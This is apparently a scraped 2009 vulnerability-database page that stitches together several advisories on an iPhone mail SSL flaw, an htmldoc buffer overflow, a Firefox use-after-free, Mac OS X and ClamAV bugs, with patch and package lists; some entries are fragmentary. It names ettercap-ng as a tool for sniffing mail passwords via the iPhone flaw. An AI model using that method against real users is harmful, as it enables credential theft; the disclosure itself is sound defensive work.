Georges Kut

Remote: Yes Local: No Published: Sep 10 2009 12:00AM Updated: Sep 11 2009 06:31PM Credit: Moudi Vulnerable: Joomla com_pressrelease 0

Solution:
Currently we are not aware of any vendor-supplied patches.

Bookmark It




Hide Sites

Info:

iPod/iPhone standard e-mail application does not validate SSL certificates
and is vulnerable to a MITM (man in the middle attack).

Vulnerable: All versions.

Discovered by: William Borskey wborskey (at) gmail (dot) com [email concealed]

Discussion:

The mail application that ships with the iPod/iPhone does not validate SSL
certificates. A malicious user can use software such as ettercap-ng to sniff
email passwords without the application warning the victim that the
certificate may be invalid.

Exploit:

This flaw can be exploited with ettercap-ng.

Bookmark It




Hide Sites

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDVSA-2009:231
http://www.mandriva.com/security/
_______________________________________________________________________

Package : htmldoc
Date : September 11, 2009
Affected: 2009.0, 2009.1, Corporate 4.0
_______________________________________________________________________

Problem Description:

A security vulnerability has been identified and fixed in htmldoc:

Buffer overflow in the set_page_size function in util.cxx in HTMLDOC
1.8.27 and earlier allows context-dependent attackers to execute
arbitrary code via a long MEDIA SIZE comment. NOTE: it was later
reported that there were additional vectors in htmllib.cxx and
ps-pdf.cxx using an AFM font file with a long glyph name, but these
vectors do not cross privilege boundaries (CVE-2009-3050).

This update provides a solution to this vulnerability.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3050
_______________________________________________________________________

Updated Packages:

Mandriva Linux 2009.0:
9ecff97cbcaa32de2c3bec214ae9ffb9 2009.0/i586/htmldoc-1.8.27-2.1mdv2009.0.i586.rpm
2dadb48ff604f983e379e3de3a3e2c58 2009.0/i586/htmldoc-nogui-1.8.27-2.1mdv2009.0.i586.rpm
3793881a911d590a4a4bc6d062203334 2009.0/SRPMS/htmldoc-1.8.27-2.1mdv2009.0.src.rpm

Mandriva Linux 2009.0/X86_64:
9353328eb2f962049d06e06515872df6 2009.0/x86_64/htmldoc-1.8.27-2.1mdv2009.0.x86_64.rpm
0cd7a69ece1fcb4a400357a3ab72cbd6 2009.0/x86_64/htmldoc-nogui-1.8.27-2.1mdv2009.0.x86_64.rpm
3793881a911d590a4a4bc6d062203334 2009.0/SRPMS/htmldoc-1.8.27-2.1mdv2009.0.src.rpm

Mandriva Linux 2009.1:
987394761cabb52d30a2936be12d45df 2009.1/i586/htmldoc-1.8.27-3.1mdv2009.1.i586.rpm
a856629efe866caa315898b8d8c032cf 2009.1/i586/htmldoc-nogui-1.8.27-3.1mdv2009.1.i586.rpm
811cc1df862042c1f861c195f6e257e8 2009.1/SRPMS/htmldoc-1.8.27-3.1mdv2009.1.src.rpm

Mandriva Linux 2009.1/X86_64:
bb3ef843a653cb80277157ec193ca1b8 2009.1/x86_64/htmldoc-1.8.27-3.1mdv2009.1.x86_64.rpm
22be1cebf3740a71bb76f299929c371e 2009.1/x86_64/htmldoc-nogui-1.8.27-3.1mdv2009.1.x86_64.rpm
811cc1df862042c1f861c195f6e257e8 2009.1/SRPMS/htmldoc-1.8.27-3.1mdv2009.1.src.rpm

Corporate 4.0:
56490816a2a8d3d3d998e1a5d6b614c3 corporate/4.0/i586/htmldoc-1.8.23-8.1.20060mlcs4.i586.rpm
4e7a0bda97b9a50858e1f8c16daa0c59 corporate/4.0/i586/htmldoc-nogui-1.8.23-8.1.20060mlcs4.i586.rpm
40616589d5ff1b6451b30fd9bdd424d4 corporate/4.0/SRPMS/htmldoc-1.8.23-8.1.20060mlcs4.src.rpm

Corporate 4.0/X86_64:
9bb6ca090589664fec4f17d9fec71a26 corporate/4.0/x86_64/htmldoc-1.8.23-8.1.20060mlcs4.x86_64.rpm
da5e19232e4f434433f3f8f243a42f6b corporate/4.0/x86_64/htmldoc-nogui-1.8.23-8.1.20060mlcs4.x86_64.rpm
40616589d5ff1b6451b30fd9bdd424d4 corporate/4.0/SRPMS/htmldoc-1.8.23-8.1.20060mlcs4.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:

gpg –recv-keys –keyserver pgp.mit.edu 0×22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team

—–BEGIN PGP SIGNATURE—–
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFKql2LmqjQ0CJFipgRAk5XAKCdZk8QBWglAsYU/RiJGgsHhEhKXgCgsXAK
6pmbc1mT5js/qnxR5ZAFXKE=
=SAGe
—–END PGP SIGNATURE—–

Bookmark It




Hide Sites

ZDI-09-065: Mozilla Firefox TreeColumns Dangling Pointer Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-065
September 10, 2009

– CVE ID:
CVE-2009-3077

– Affected Vendors:
Mozilla Firefox

– Affected Products:
Mozilla Firefox 3

– TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8442.
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

– Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Mozilla Firefox. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page.

The specific flaw exists during the redrawing of tree columns contained
within a XUL document. Due to the reuse of a previously freed object,
attacker controlled memory can be executed. Successful exploitation of
this vulnerability can lead to remote compromise of the affected system
under the credentials of the currently logged in user.

– Vendor Response:
Mozilla Firefox has issued an update to correct this vulnerability. More
details can be found at:

http://www.mozilla.org/security/announce/2009/mfsa2009-49.html

– Disclosure Timeline:
2009-07-28 – Vulnerability reported to vendor
2009-09-10 – Coordinated public release of advisory

– Credit:
This vulnerability was discovered by:
* Anonymous

– About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Bookmark It




Hide Sites

CVE: CVE-2009-2800 Remote: Yes Local: No Published: Sep 10 2009 12:00AM Updated: Sep 11 2009 09:11AM Credit: Apple Vulnerable: Apple Mac OS X Server 10.5.8
Apple Mac OS X Server 10.5.7
Apple Mac OS X Server 10.5.6
Apple Mac OS X Server 10.5.5
Apple Mac OS X Server 10.5.4
Apple Mac OS X Server 10.5.3
Apple Mac OS X Server 10.5.2
Apple Mac OS X Server 10.5.1
Apple Mac OS X Server 10.4.11
Apple Mac OS X Server 10.4.11
Apple Mac OS X Server 10.4.10
Apple Mac OS X Server 10.4.9
Apple Mac OS X Server 10.4.8
Apple Mac OS X Server 10.4.7
Apple Mac OS X Server 10.4.6
Apple Mac OS X Server 10.4.5
Apple Mac OS X Server 10.4.4
Apple Mac OS X Server 10.4.3
Apple Mac OS X Server 10.4.2
Apple Mac OS X Server 10.4.1
Apple Mac OS X Server 10.4
Apple Mac OS X Server 10.5
Apple Mac OS X 10.5.8
Apple Mac OS X 10.5.7
Apple Mac OS X 10.5.6
Apple Mac OS X 10.5.5
Apple Mac OS X 10.5.4
Apple Mac OS X 10.5.3
Apple Mac OS X 10.5.2
Apple Mac OS X 10.5.1
Apple Mac OS X 10.4.11
Apple Mac OS X 10.4.11
Apple Mac OS X 10.4.10
Apple Mac OS X 10.4.9
Apple Mac OS X 10.4.8
Apple Mac OS X 10.4.7
Apple Mac OS X 10.4.6
Apple Mac OS X 10.4.5
Apple Mac OS X 10.4.4
Apple Mac OS X 10.4.3
Apple Mac OS X 10.4.2
Apple Mac OS X 10.5

Solution:
The vendor has released an advisory and updates. Please see the references for details.

Apple Mac OS X Server 10.4.11

• Apple SecUpdSrvr2009-005PPC.dmg
  PPC
  http://www.apple.com/support/downloads/
• Apple SecUpdSrvr2009-005Univ.dmg
  Universal
  http://www.apple.com/support/downloads/

Apple Mac OS X 10.4.11

• Apple SecUpd2009-005Intel.dmg
  Intel
  http://www.apple.com/support/downloads/
• Apple SecUpd2009-005PPC.dmg
  PPC
  http://www.apple.com/support/downloads/

Apple Mac OS X Server 10.5.8

• Apple SecUpdSrvr2009-005.dmg
  http://www.apple.com/support/downloads/

Apple Mac OS X 10.5.8

• Apple SecUpd2009-005.dmg
  http://www.apple.com/support/downloads/

Bookmark It




Hide Sites

CVE: CVE-2009-2804 Remote: Yes Local: No Published: Sep 11 2009 12:00AM Updated: Sep 11 2009 12:00AM Credit: Apple Vulnerable: Apple Mac OS X Server 10.5.8
Apple Mac OS X Server 10.5.7
Apple Mac OS X Server 10.5.6
Apple Mac OS X Server 10.5.5
Apple Mac OS X Server 10.5.4
Apple Mac OS X Server 10.5.3
Apple Mac OS X Server 10.5.2
Apple Mac OS X Server 10.5.1
Apple Mac OS X Server 10.4.11
Apple Mac OS X Server 10.4.11
Apple Mac OS X Server 10.4.10
Apple Mac OS X Server 10.4.9
Apple Mac OS X Server 10.4.8
Apple Mac OS X Server 10.4.7
Apple Mac OS X Server 10.4.6
Apple Mac OS X Server 10.4.5
Apple Mac OS X Server 10.4.4
Apple Mac OS X Server 10.4.3
Apple Mac OS X Server 10.4.2
Apple Mac OS X Server 10.4.1
Apple Mac OS X Server 10.4
Apple Mac OS X Server 10.5
Apple Mac OS X 10.5.8
Apple Mac OS X 10.5.7
Apple Mac OS X 10.5.6
Apple Mac OS X 10.5.5
Apple Mac OS X 10.5.4
Apple Mac OS X 10.5.3
Apple Mac OS X 10.5.2
Apple Mac OS X 10.5.1
Apple Mac OS X 10.4.11
Apple Mac OS X 10.4.11
Apple Mac OS X 10.4.10
Apple Mac OS X 10.4.9
Apple Mac OS X 10.4.8
Apple Mac OS X 10.4.7
Apple Mac OS X 10.4.6
Apple Mac OS X 10.4.5
Apple Mac OS X 10.4.4
Apple Mac OS X 10.4.3
Apple Mac OS X 10.4.2
Apple Mac OS X 10.5

Solution:
The vendor has released an advisory and updates. Please see the references for details.

Apple Mac OS X Server 10.4.11

• Apple SecUpdSrvr2009-005PPC.dmg
  PPC
  http://www.apple.com/support/downloads/
• Apple SecUpdSrvr2009-005Univ.dmg
  Universal
  http://www.apple.com/support/downloads/

Apple Mac OS X 10.4.11

• Apple SecUpd2009-005Intel.dmg
  Intel
  http://www.apple.com/support/downloads/
• Apple SecUpd2009-005PPC.dmg
  PPC
  http://www.apple.com/support/downloads/

Apple Mac OS X Server 10.5.8

• Apple SecUpdSrvr2009-005.dmg
  http://www.apple.com/support/downloads/

Apple Mac OS X 10.5.8

• Apple SecUpd2009-005.dmg
  http://www.apple.com/support/downloads/

Bookmark It




Hide Sites

Remote: Yes Local: No Published: Sep 11 2009 12:00AM Updated: Sep 11 2009 12:00AM Credit: Moudi Vulnerable: Joomla com_mediaalert 0 Bookmark It




Hide Sites

CVE: CVE-2009-1371
CVE-2009-1372 Remote: Yes Local: No Published: Apr 09 2009 12:00AM Updated: Sep 10 2009 06:11PM Credit: Martin Olsen and Nigel Vulnerable: Ubuntu Ubuntu Linux 8.10 sparc
Ubuntu Ubuntu Linux 8.10 powerpc
Ubuntu Ubuntu Linux 8.10 lpia
Ubuntu Ubuntu Linux 8.10 i386
Ubuntu Ubuntu Linux 8.10 amd64
MandrakeSoft Linux Mandrake 2009.0 x86_64
MandrakeSoft Linux Mandrake 2009.0
MandrakeSoft Linux Mandrake 2008.1 x86_64
MandrakeSoft Linux Mandrake 2008.1
MandrakeSoft Corporate Server 4.0 x86_64
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
MandrakeSoft Corporate Server 4.0
ifenslave ifenslave 0.88
Gentoo Linux
Clam Anti-Virus ClamAV 0.94.2
Clam Anti-Virus ClamAV 0.94.1
Clam Anti-Virus ClamAV 0.93.3
Clam Anti-Virus ClamAV 0.93.1
Clam Anti-Virus ClamAV 0.92.1
Clam Anti-Virus ClamAV 0.91.2
Clam Anti-Virus ClamAV 0.91.1
Clam Anti-Virus ClamAV 0.90.3
Clam Anti-Virus ClamAV 0.90.2
Clam Anti-Virus ClamAV 0.90.1
+ Debian Linux 4.0 sparc
+ Debian Linux 4.0 s/390
+ Debian Linux 4.0 powerpc
+ Debian Linux 4.0 mipsel
+ Debian Linux 4.0 mips
+ Debian Linux 4.0 m68k
+ Debian Linux 4.0 ia-64
+ Debian Linux 4.0 ia-32
+ Debian Linux 4.0 hppa
+ Debian Linux 4.0 arm
+ Debian Linux 4.0 amd64
+ Debian Linux 4.0 alpha
+ Debian Linux 4.0
Clam Anti-Virus ClamAV 0.90
– MandrakeSoft Corporate Server 4.0 x86_64
– MandrakeSoft Corporate Server 3.0 x86_64
– MandrakeSoft Corporate Server 3.0
– MandrakeSoft Corporate Server 4.0
– MandrakeSoft Linux Mandrake 2007.1 x86_64
– MandrakeSoft Linux Mandrake 2007.1
– MandrakeSoft Linux Mandrake 2007.0 x86_64
– MandrakeSoft Linux Mandrake 2007.0
Clam Anti-Virus ClamAV 0.88.5
Clam Anti-Virus ClamAV 0.88.4
Clam Anti-Virus ClamAV 0.88.3
Clam Anti-Virus ClamAV 0.88.2
Clam Anti-Virus ClamAV 0.88.1
Clam Anti-Virus ClamAV 0.87.1
Clam Anti-Virus ClamAV 0.87 -1
Clam Anti-Virus ClamAV 0.87
Clam Anti-Virus ClamAV 0.86.2
Clam Anti-Virus ClamAV 0.86 .1
Clam Anti-Virus ClamAV 0.86
Clam Anti-Virus ClamAV 0.85.1
Clam Anti-Virus ClamAV 0.85
Clam Anti-Virus ClamAV 0.84 rc2
Clam Anti-Virus ClamAV 0.84 rc1
Clam Anti-Virus ClamAV 0.84
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
Clam Anti-Virus ClamAV 0.83
Clam Anti-Virus ClamAV 0.82
Clam Anti-Virus ClamAV 0.81
+ Gentoo Linux
Clam Anti-Virus ClamAV 0.80 rc4
Clam Anti-Virus ClamAV 0.80 rc3
Clam Anti-Virus ClamAV 0.80 rc2
Clam Anti-Virus ClamAV 0.80 rc1
Clam Anti-Virus ClamAV 0.80
Clam Anti-Virus ClamAV 0.75.1
Clam Anti-Virus ClamAV 0.70
Clam Anti-Virus ClamAV 0.68 -1
Clam Anti-Virus ClamAV 0.68
Clam Anti-Virus ClamAV 0.67
+ Gentoo Linux 1.4 _rc3
+ Gentoo Linux 1.4 _rc2
+ Gentoo Linux 1.4 _rc1
+ Gentoo Linux 1.4
Clam Anti-Virus ClamAV 0.65
Clam Anti-Virus ClamAV 0.60
Clam Anti-Virus ClamAV 0.54
Clam Anti-Virus ClamAV 0.53
Clam Anti-Virus ClamAV 0.52
Clam Anti-Virus ClamAV 0.51
Clam Anti-Virus ClamAV 0.95
Clam Anti-Virus ClamAV 0.94
Clam Anti-Virus ClamAV 0.93
Clam Anti-Virus ClamAV 0.92
Clam Anti-Virus ClamAV 0.91
Clam Anti-Virus ClamAV 0.88.6 Not Vulnerable: Clam Anti-Virus ClamAV 0.95.1

Solution:
Updates are available. Please see the references for more information.

Clam Anti-Virus ClamAV 0.88.6

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Ubuntu Ubuntu Linux 8.10 powerpc

• Ubuntu clamav-base_0.94.dfsg.2-1ubuntu0.3_all.deb
  http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-base_0.94. dfsg.2-1ubuntu0.3_all.deb
• Ubuntu clamav-daemon_0.94.dfsg.2-1ubuntu0.3_powerpc.deb
  http://ports.ubuntu.com/pool/main/c/clamav/clamav-daemon_0.94.dfsg.2-1 ubuntu0.3_powerpc.deb
• Ubuntu clamav-dbg_0.94.dfsg.2-1ubuntu0.3_powerpc.deb
  http://ports.ubuntu.com/pool/main/c/clamav/clamav-dbg_0.94.dfsg.2-1ubu ntu0.3_powerpc.deb
• Ubuntu clamav-docs_0.94.dfsg.2-1ubuntu0.3_all.deb
  http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-docs_0.94. dfsg.2-1ubuntu0.3_all.deb
• Ubuntu clamav-freshclam_0.94.dfsg.2-1ubuntu0.3_powerpc.deb
  http://ports.ubuntu.com/pool/main/c/clamav/clamav-freshclam_0.94.dfsg. 2-1ubuntu0.3_powerpc.deb
• Ubuntu clamav-milter_0.94.dfsg.2-1ubuntu0.3_powerpc.deb
  http://ports.ubuntu.com/pool/universe/c/clamav/clamav-milter_0.94.dfsg .2-1ubuntu0.3_powerpc.deb
• Ubuntu clamav-testfiles_0.94.dfsg.2-1ubuntu0.3_all.deb
  http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-testfi les_0.94.dfsg.2-1ubuntu0.3_all.deb
• Ubuntu clamav_0.94.dfsg.2-1ubuntu0.3_powerpc.deb
  http://ports.ubuntu.com/pool/main/c/clamav/clamav_0.94.dfsg.2-1ubuntu0 .3_powerpc.deb
• Ubuntu libclamav-dev_0.94.dfsg.2-1ubuntu0.3_powerpc.deb
  http://ports.ubuntu.com/pool/main/c/clamav/libclamav-dev_0.94.dfsg.2-1 ubuntu0.3_powerpc.deb
• Ubuntu libclamav5_0.94.dfsg.2-1ubuntu0.3_powerpc.deb
  http://ports.ubuntu.com/pool/main/c/clamav/libclamav5_0.94.dfsg.2-1ubu ntu0.3_powerpc.deb

Ubuntu Ubuntu Linux 8.10 sparc

• Ubuntu clamav-base_0.94.dfsg.2-1ubuntu0.3_all.deb
  http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-base_0.94. dfsg.2-1ubuntu0.3_all.deb
• Ubuntu clamav-daemon_0.94.dfsg.2-1ubuntu0.3_sparc.deb
  http://ports.ubuntu.com/pool/main/c/clamav/clamav-daemon_0.94.dfsg.2-1 ubuntu0.3_sparc.deb
• Ubuntu clamav-dbg_0.94.dfsg.2-1ubuntu0.3_sparc.deb
  http://ports.ubuntu.com/pool/main/c/clamav/clamav-dbg_0.94.dfsg.2-1ubu ntu0.3_sparc.deb
• Ubuntu clamav-docs_0.94.dfsg.2-1ubuntu0.3_all.deb
  http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-docs_0.94. dfsg.2-1ubuntu0.3_all.deb
• Ubuntu clamav-freshclam_0.94.dfsg.2-1ubuntu0.3_sparc.deb
  http://ports.ubuntu.com/pool/main/c/clamav/clamav-freshclam_0.94.dfsg. 2-1ubuntu0.3_sparc.deb
• Ubuntu clamav-milter_0.94.dfsg.2-1ubuntu0.3_sparc.deb
  http://ports.ubuntu.com/pool/universe/c/clamav/clamav-milter_0.94.dfsg .2-1ubuntu0.3_sparc.deb
• Ubuntu clamav-testfiles_0.94.dfsg.2-1ubuntu0.3_all.deb
  http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-testfi les_0.94.dfsg.2-1ubuntu0.3_all.deb
• Ubuntu clamav_0.94.dfsg.2-1ubuntu0.3_sparc.deb
  http://ports.ubuntu.com/pool/main/c/clamav/clamav_0.94.dfsg.2-1ubuntu0 .3_sparc.deb
• Ubuntu libclamav-dev_0.94.dfsg.2-1ubuntu0.3_sparc.deb
  http://ports.ubuntu.com/pool/main/c/clamav/libclamav-dev_0.94.dfsg.2-1 ubuntu0.3_sparc.deb
• Ubuntu libclamav5_0.94.dfsg.2-1ubuntu0.3_sparc.deb
  http://ports.ubuntu.com/pool/main/c/clamav/libclamav5_0.94.dfsg.2-1ubu ntu0.3_sparc.deb

Clam Anti-Virus ClamAV 0.95

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

MandrakeSoft Linux Mandrake 2009.0 x86_64

• Mandriva clamav-0.95.1-2.1mdv2009.0.x86_64.rpm
  http://www.mandriva.com/en/download/
• Mandriva clamav-db-0.95.1-2.1mdv2009.0.x86_64.rpm
  http://www.mandriva.com/en/download/
• Mandriva clamav-milter-0.95.1-2.1mdv2009.0.x86_64.rpm
  http://www.mandriva.com/en/download/
• Mandriva clamd-0.95.1-2.1mdv2009.0.x86_64.rpm
  http://www.mandriva.com/en/download/
• Mandriva lib64clamav-devel-0.95.1-2.1mdv2009.0.x86_64.rpm
  http://www.mandriva.com/en/download/
• Mandriva lib64clamav6-0.95.1-2.1mdv2009.0.x86_64.rpm
  http://www.mandriva.com/en/download/

Clam Anti-Virus ClamAV 0.93

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Ubuntu Ubuntu Linux 8.10 amd64

• Ubuntu clamav-base_0.94.dfsg.2-1ubuntu0.3_all.deb
  http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-base_0.94. dfsg.2-1ubuntu0.3_all.deb
• Ubuntu clamav-daemon_0.94.dfsg.2-1ubuntu0.3_amd64.deb
  http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-daemon_0.9 4.dfsg.2-1ubuntu0.3_amd64.deb
• Ubuntu clamav-dbg_0.94.dfsg.2-1ubuntu0.3_amd64.deb
  http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-dbg_0.94.d fsg.2-1ubuntu0.3_amd64.deb
• Ubuntu clamav-docs_0.94.dfsg.2-1ubuntu0.3_all.deb
  http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-docs_0.94. dfsg.2-1ubuntu0.3_all.deb
• Ubuntu clamav-freshclam_0.94.dfsg.2-1ubuntu0.3_amd64.deb
  http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-freshclam_ 0.94.dfsg.2-1ubuntu0.3_amd64.deb
• Ubuntu clamav-milter_0.94.dfsg.2-1ubuntu0.3_amd64.deb
  http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-milter _0.94.dfsg.2-1ubuntu0.3_amd64.deb
• Ubuntu clamav-testfiles_0.94.dfsg.2-1ubuntu0.3_all.deb
  http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-testfi les_0.94.dfsg.2-1ubuntu0.3_all.deb
• Ubuntu clamav_0.94.dfsg.2-1ubuntu0.3_amd64.deb
  http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.94.dfsg. 2-1ubuntu0.3_amd64.deb
• Ubuntu libclamav-dev_0.94.dfsg.2-1ubuntu0.3_amd64.deb
  http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav-dev_0.9 4.dfsg.2-1ubuntu0.3_amd64.deb
• Ubuntu libclamav5_0.94.dfsg.2-1ubuntu0.3_amd64.deb
  http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav5_0.94.d fsg.2-1ubuntu0.3_amd64.deb

MandrakeSoft Linux Mandrake 2008.1 x86_64

• Mandriva clamav-0.95.1-2.1mdv2008.1.x86_64.rpm
  http://www.mandriva.com/en/download/
• Mandriva clamav-db-0.95.1-2.1mdv2008.1.x86_64.rpm
  http://www.mandriva.com/en/download/
• Mandriva clamav-milter-0.95.1-2.1mdv2008.1.x86_64.rpm
  http://www.mandriva.com/en/download/
• Mandriva clamd-0.95.1-2.1mdv2008.1.x86_64.rpm
  http://www.mandriva.com/en/download/
• Mandriva lib64clamav-devel-0.95.1-2.1mdv2008.1.x86_64.rpm
  http://www.mandriva.com/en/download/
• Mandriva lib64clamav6-0.95.1-2.1mdv2008.1.x86_64.rpm
  http://www.mandriva.com/en/download/

MandrakeSoft Linux Mandrake 2008.1

• Mandriva clamav-0.95.1-2.1mdv2008.1.i586.rpm
  http://www.mandriva.com/en/download/
• Mandriva clamav-db-0.95.1-2.1mdv2008.1.i586.rpm
  http://www.mandriva.com/en/download/
• Mandriva clamav-milter-0.95.1-2.1mdv2008.1.i586.rpm
  http://www.mandriva.com/en/download/
• Mandriva clamd-0.95.1-2.1mdv2008.1.i586.rpm
  http://www.mandriva.com/en/download/
• Mandriva libclamav-devel-0.95.1-2.1mdv2008.1.i586.rpm
  http://www.mandriva.com/en/download/
• Mandriva libclamav6-0.95.1-2.1mdv2008.1.i586.rpm
  http://www.mandriva.com/en/download/

Ubuntu Ubuntu Linux 8.10 i386

• Ubuntu clamav-base_0.94.dfsg.2-1ubuntu0.3_all.deb
  http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-base_0.94. dfsg.2-1ubuntu0.3_all.deb
• Ubuntu clamav-daemon_0.94.dfsg.2-1ubuntu0.3_i386.deb
  http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-daemon_0.9 4.dfsg.2-1ubuntu0.3_i386.deb
• Ubuntu clamav-dbg_0.94.dfsg.2-1ubuntu0.3_i386.deb
  http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-dbg_0.94.d fsg.2-1ubuntu0.3_i386.deb
• Ubuntu clamav-docs_0.94.dfsg.2-1ubuntu0.3_all.deb
  http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-docs_0.94. dfsg.2-1ubuntu0.3_all.deb
• Ubuntu clamav-freshclam_0.94.dfsg.2-1ubuntu0.3_i386.deb
  http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-freshclam_ 0.94.dfsg.2-1ubuntu0.3_i386.deb
• Ubuntu clamav-milter_0.94.dfsg.2-1ubuntu0.3_i386.deb
  http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-milter _0.94.dfsg.2-1ubuntu0.3_i386.deb
• Ubuntu clamav-testfiles_0.94.dfsg.2-1ubuntu0.3_all.deb
  http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-testfi les_0.94.dfsg.2-1ubuntu0.3_all.deb
• Ubuntu clamav_0.94.dfsg.2-1ubuntu0.3_i386.deb
  http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.94.dfsg. 2-1ubuntu0.3_i386.deb
• Ubuntu libclamav-dev_0.94.dfsg.2-1ubuntu0.3_i386.deb
  http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav-dev_0.9 4.dfsg.2-1ubuntu0.3_i386.deb
• Ubuntu libclamav5_0.94.dfsg.2-1ubuntu0.3_i386.deb
  http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav5_0.94.d fsg.2-1ubuntu0.3_i386.deb

Clam Anti-Virus ClamAV 0.94

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Ubuntu Ubuntu Linux 8.10 lpia

• Ubuntu clamav-base_0.94.dfsg.2-1ubuntu0.3_all.deb
  http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-base_0.94. dfsg.2-1ubuntu0.3_all.deb
• Ubuntu clamav-daemon_0.94.dfsg.2-1ubuntu0.3_lpia.deb
  http://ports.ubuntu.com/pool/main/c/clamav/clamav-daemon_0.94.dfsg.2-1 ubuntu0.3_lpia.deb
• Ubuntu clamav-dbg_0.94.dfsg.2-1ubuntu0.3_lpia.deb
  http://ports.ubuntu.com/pool/main/c/clamav/clamav-dbg_0.94.dfsg.2-1ubu ntu0.3_lpia.deb
• Ubuntu clamav-docs_0.94.dfsg.2-1ubuntu0.3_all.deb
  http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-docs_0.94. dfsg.2-1ubuntu0.3_all.deb
• Ubuntu clamav-freshclam_0.94.dfsg.2-1ubuntu0.3_lpia.deb
  http://ports.ubuntu.com/pool/main/c/clamav/clamav-freshclam_0.94.dfsg. 2-1ubuntu0.3_lpia.deb
• Ubuntu clamav-milter_0.94.dfsg.2-1ubuntu0.3_lpia.deb
  http://ports.ubuntu.com/pool/universe/c/clamav/clamav-milter_0.94.dfsg .2-1ubuntu0.3_lpia.deb
• Ubuntu clamav-testfiles_0.94.dfsg.2-1ubuntu0.3_all.deb
  http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-testfi les_0.94.dfsg.2-1ubuntu0.3_all.deb
• Ubuntu clamav_0.94.dfsg.2-1ubuntu0.3_lpia.deb
  http://ports.ubuntu.com/pool/main/c/clamav/clamav_0.94.dfsg.2-1ubuntu0 .3_lpia.deb
• Ubuntu libclamav-dev_0.94.dfsg.2-1ubuntu0.3_lpia.deb
  http://ports.ubuntu.com/pool/main/c/clamav/libclamav-dev_0.94.dfsg.2-1 ubuntu0.3_lpia.deb
• Ubuntu libclamav5_0.94.dfsg.2-1ubuntu0.3_lpia.deb
  http://ports.ubuntu.com/pool/main/c/clamav/libclamav5_0.94.dfsg.2-1ubu ntu0.3_lpia.deb

MandrakeSoft Linux Mandrake 2009.0

• Mandriva clamav-0.95.1-2.1mdv2009.0.i586.rpm
  http://www.mandriva.com/en/download/
